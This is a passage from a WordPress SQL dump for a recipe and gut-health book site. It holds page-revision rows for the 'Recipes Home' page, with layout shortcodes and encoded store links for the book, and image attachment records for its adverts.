block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 00:59:46','2020-04-19 00:59:46','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5202,1,'2020-04-19 01:01:05','2020-04-19 01:01:05','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:01:05','2020-04-19 01:01:05','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5203,1,'2020-04-19 01:02:45','2020-04-19 01:02:45','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:02:45','2020-04-19 01:02:45','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5204,1,'2020-04-19 01:03:44','2020-04-19 01:03:44','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:03:44','2020-04-19 01:03:44','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5205,1,'2020-04-19 01:05:36','2020-04-19 01:05:36','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:05:36','2020-04-19 01:05:36','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5206,1,'2020-04-19 01:11:45','2020-04-19 01:11:45','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row][vc_row][vc_column][vc_wp_posts number=\"5\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:11:45','2020-04-19 01:11:45','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5208,1,'2020-04-19 01:13:06','2020-04-19 01:13:06','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"10\" grid_id=\"vc_gid:1587258752984-507ff9fa-c2d7-1\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:13:06','2020-04-19 01:13:06','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5209,1,'2020-04-19 01:14:08','2020-04-19 01:14:08','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"10\" element_width=\"12\" grid_id=\"vc_gid:1587258795888-b5361748-f3f3-6\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:14:08','2020-04-19 01:14:08','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5210,1,'2020-04-19 01:15:15','2020-04-19 01:15:15','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"10\" element_width=\"6\" grid_id=\"vc_gid:1587258863347-e3f37e0a-bcbb-8\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:15:15','2020-04-19 01:15:15','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5211,1,'2020-04-19 01:16:33','2020-04-19 01:16:33','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587258926194-694a63b3-345c-3\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:16:33','2020-04-19 01:16:33','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5214,1,'2020-04-27 08:45:46','2020-04-27 08:45:46','','book-slider-AmazonUS','','inherit','open','closed','','book-slider-amazonus','','','2020-04-27 08:45:53','2020-04-27 08:45:53','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/book-slider-AmazonUS.jpg',0,'attachment','image/jpeg',0),(5217,1,'2020-04-27 08:46:25','2020-04-27 08:46:25','','book-slider-AmazonUK','','inherit','open','closed','','book-slider-amazonuk','','','2020-04-27 08:46:39','2020-04-27 08:46:39','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/book-slider-AmazonUK.jpg',0,'attachment','image/jpeg',0),(5220,1,'2020-04-27 08:50:02','2020-04-27 08:50:02','','book-slider-pic4','','inherit','open','closed','','book-slider-pic4','','','2020-04-27 08:50:21','2020-04-27 08:50:21','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/book-slider-pic4.jpg',0,'attachment','image/jpeg',0),(5223,1,'2020-04-19 09:45:46','2020-04-19 09:45:46','','Advert-book-for-NW','','inherit','open','closed','','advert-book-for-nw','','','2020-04-19 09:45:46','2020-04-19 09:45:46','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Advert-book-for-NW.jpg',0,'attachment','image/jpeg',0),(5225,1,'2020-04-19 01:29:54','2020-04-19 01:29:54','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"no\" post_info_comments=\"no\" number_of_posts=\"4\" category=\"book\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587259004098-63893420-74fc-5\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:29:54','2020-04-19 01:29:54','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5230,1,'2020-04-19 01:33:14','2020-04-19 01:33:14','[vc_row][vc_column][vc_images_carousel images=\"5214,5217,5220,5223\" title=\"Buy Book Now\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587259808713-ca4bff9d-5ffd-8\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:33:14','2020-04-19 01:33:14','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5231,1,'2020-04-19 01:34:04','2020-04-19 01:34:04','[vc_row][vc_column][vc_images_carousel images=\"5214,5217,5220,5223\" slides_per_view=\"3\" title=\"Buy Book Now\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260005642-2b582f27-0669-10\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:34:04','2020-04-19 01:34:04','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5232,1,'2020-04-19 01:35:10','2020-04-19 01:35:10','[vc_row][vc_column][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"four\" space_between_items=\"large\" images=\"5214,5217,5220,5223\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260056395-d4be6a36-079f-9\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:35:10','2020-04-19 01:35:10','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5233,1,'2020-04-19 01:36:02','2020-04-19 01:36:02','[vc_row][vc_column][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"four\" space_between_items=\"large\" images=\"5214,5217,5220,5223\" image_size=\"large\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260121126-05a3e38d-04f9-3\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:36:02','2020-04-19 01:36:02','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5234,1,'2020-04-19 01:36:41','2020-04-19 01:36:41','[vc_row][vc_column][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"four\" space_between_items=\"large\" images=\"5214,5217,5220,5223\" image_size=\"full\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260174808-cb6fd2ab-f6ca-1\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:36:41','2020-04-19 01:36:41','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5235,1,'2020-04-19 01:41:53','2020-04-19 01:41:53','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260211775-6d2bf4ea-c15b-0\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:41:53','2020-04-19 01:41:53','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5236,1,'2020-04-19 01:42:58','2020-04-19 01:42:58','[vc_row][vc_column][vc_gallery type=\"image_grid\" images=\"5214,5217,5220,5223\" img_size=\"medium\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260523432-75068f6f-ab02-2\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:42:58','2020-04-19 01:42:58','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5237,1,'2020-04-19 01:43:34','2020-04-19 01:43:34','[vc_row][vc_column][vc_gallery type=\"nivo\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260590137-311e059e-9000-6\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:43:34','2020-04-19 01:43:34','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5238,1,'2020-04-19 01:44:08','2020-04-19 01:44:08','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260625281-4c965c59-baf8-5\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:44:08','2020-04-19 01:44:08','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5239,1,'2020-04-19 01:45:25','2020-04-19 01:45:25','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260658725-fc38ce6d-8234-10\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:45:25','2020-04-19 01:45:25','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5240,1,'2020-04-19 01:45:51','2020-04-19 01:45:51','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5214,5217,5220,5223\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260736097-7b3225c3-3887-8\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:45:51','2020-04-19 01:45:51','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5241,1,'2020-04-19 01:46:14','2020-04-19 01:46:14','[vc_row][vc_column][vc_gallery type=\"image_grid\" images=\"5214,5217,5220,5223\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260763097-2135c795-b41e-8\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:46:14','2020-04-19 01:46:14','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5242,1,'2020-04-19 01:48:22','2020-04-19 01:48:22','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260785466-8f887583-0757-1\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:48:22','2020-04-19 01:48:22','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5243,1,'2020-04-19 01:52:44','2020-04-19 01:52:44','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][vc_video link=\"https://youtu.be/O-ONccSRmJ8\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587260913622-608f228e-0279-4\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:52:44','2020-04-19 01:52:44','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5244,1,'2020-04-19 01:53:46','2020-04-19 01:53:46','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587261208128-107727e0-31fd-7\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 01:53:46','2020-04-19 01:53:46','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5245,1,'2020-04-19 13:33:03','2020-04-19 13:33:03','','long-advert-book-NW','','inherit','open','closed','','long-advert-book-nw','','','2020-04-19 13:35:14','2020-04-19 13:35:14','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/long-advert-book-NW.jpg',0,'attachment','image/jpeg',0),(5246,1,'2020-04-19 13:32:09','2020-04-19 13:32:09','','long-advert-text-NW','','inherit','open','closed','','long-advert-text-nw','','','2020-04-19 13:32:16','2020-04-19 13:32:16','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/long-advert-text-NW.jpg',0,'attachment','image/jpeg',0),(5247,1,'2020-04-19 13:30:08','2020-04-19 13:30:08','','long-advert-NW-recipes','','inherit','open','closed','','long-advert-nw-recipes','','','2020-04-19 13:31:03','2020-04-19 13:31:03','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/long-advert-NW-recipes.jpg',0,'attachment','image/jpeg',0),(5248,1,'2020-04-19 02:10:29','2020-04-19 02:10:29','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223,5245,5246,5247\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587261237624-af3ddea8-e6dc-4\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 02:10:29','2020-04-19 02:10:29','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5249,1,'2020-04-19 02:11:18','2020-04-19 02:11:18','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5245,5246,5247\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587262242121-10aaf22b-8121-10\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 02:11:18','2020-04-19 02:11:18','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5250,1,'2020-04-19 02:13:06','2020-04-19 02:13:06','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587262289712-47b2d03d-6e8b-7\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 02:13:06','2020-04-19 02:13:06','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5251,1,'2020-04-19 02:14:04','2020-04-19 02:14:04','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587262397532-b04aa6c6-7a69-2\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-19 02:14:04','2020-04-19 02:14:04','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5254,1,'2020-04-19 02:36:56','2020-04-19 02:36:56','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
